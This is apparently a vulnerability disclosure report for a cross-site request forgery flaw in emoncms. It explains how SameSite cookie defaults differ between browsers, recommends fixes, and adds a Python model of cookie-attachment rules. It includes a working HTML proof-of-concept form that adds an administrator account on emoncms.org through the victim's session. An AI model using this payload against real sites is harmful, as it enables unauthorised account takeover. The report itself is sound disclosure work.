Cross-Site Request Forgery (CSRF) in emoncms/emoncms
Jul 22nd 2021
When a cookie is set without a SameSite attribute, each browser applies a default of its own. Chrome and Chromium-based browsers treat such cookies as SameSite=Lax, which means that if your site performs add/delete/alter operations in a GET request, it remains vulnerable to CSRF attacks.
But Firefox (one of the big ones) does not default to Lax; it treats the cookie as SameSite=None, which leaves both POST and GET requests vulnerable to CSRF attacks.
In Firefox, I can add any administrator in the "Administer multiple accounts" part of the profile section with CSRF, an action users are already allowed to do manually.
🕵️♂️ Proof of Concept
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://emoncms.org/billing/account-add.json" method="POST">
      <input type="hidden" name="username" value="newuesr" />
      <input type="hidden" name="password" value="newpassword" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
This vulnerability makes it possible to add any administrator when the victim uses Firefox.
You should set the SameSite attribute to Lax and only write data through HTTP methods such as POST and PUT, never GET, on your site.
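To make the two points above concrete (which requests still carry the session cookie under each browser default, and what the recommended fix changes), here is an added Python model written for this report. It is not emoncms code. It assumes the browser defaults exactly as the report states them (Chrome: Lax when the attribute is absent, Firefox: None), encodes the standard SameSite rules (Strict: never cross-site; Lax: only top-level navigations with safe methods; None: always), and the cookie name `session` and the `Request` fields are constructed for the example.

```python
"""Model of SameSite cookie attachment plus the hardened Set-Cookie header.

Added illustration for this report, not emoncms code. Browser defaults below
are the ones the report describes for cookies set without a SameSite attribute.
"""
from dataclasses import dataclass
from typing import Optional

# Default the browser applies when Set-Cookie carries no SameSite attribute
# (assumption taken from the report: Chrome -> Lax, Firefox -> None).
BROWSER_DEFAULT = {"chrome": "Lax", "firefox": "None"}

# HTTP "safe" methods in the RFC sense: they must not change server state.
SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}


@dataclass(frozen=True)
class Request:
    method: str
    cross_site: bool   # the page issuing the request is on a different site
    top_level: bool    # a navigation (link click, form submit), not a subresource/fetch


def effective_samesite(browser: str, attribute: Optional[str]) -> str:
    """SameSite value the browser enforces: the explicit one, else its default."""
    return attribute if attribute is not None else BROWSER_DEFAULT[browser]


def cookie_attached(samesite: str, req: Request) -> bool:
    """Whether a cookie with this SameSite value is sent along with the request."""
    if not req.cross_site:
        return True                       # same-site requests always carry cookies
    if samesite == "None":
        return True                       # sent everywhere (browsers also require Secure)
    if samesite == "Strict":
        return False                      # never sent on cross-site requests
    # Lax: only on top-level navigations that use a safe method (e.g. a GET link/form)
    return req.top_level and req.method.upper() in SAFE_METHODS


def csrf_exposed(browser: str, attribute: Optional[str], req: Request) -> bool:
    """True when a forged cross-site request would carry the victim's session cookie."""
    return req.cross_site and cookie_attached(effective_samesite(browser, attribute), req)


def session_set_cookie(name: str, value: str) -> str:
    """Set-Cookie header value applying the report's recommendation (explicit Lax)."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


def write_allowed(method: str) -> bool:
    """Server-side rule: state-changing endpoints reject GET/HEAD, which Lax still lets through cross-site."""
    return method.upper() not in SAFE_METHODS


if __name__ == "__main__":
    # Constructed scenario mirroring the PoC: a cross-site auto-submitted POST form.
    forged_post = Request("POST", cross_site=True, top_level=True)
    forged_get = Request("GET", cross_site=True, top_level=True)
    for browser in ("chrome", "firefox"):
        for req in (forged_post, forged_get):
            print(browser, req.method, "no attribute ->", csrf_exposed(browser, None, req),
                  "| explicit Lax ->", csrf_exposed(browser, "Lax", req))
    print(session_set_cookie("session", "constructed-session-id"))
```

The matrix the script prints is the report's argument in one screen: with no attribute, the forged POST carries the cookie only in Firefox; with an explicit Lax it carries the cookie in neither browser; the forged GET carries the cookie in both browsers regardless, which is why `write_allowed` refuses writes over GET. One caveat for the Chrome column: Chromium temporarily treats an attribute-less cookie set within the last two minutes as Lax-but-allowing-POST, so relying on the default rather than an explicit SameSite=Lax leaves a window even there.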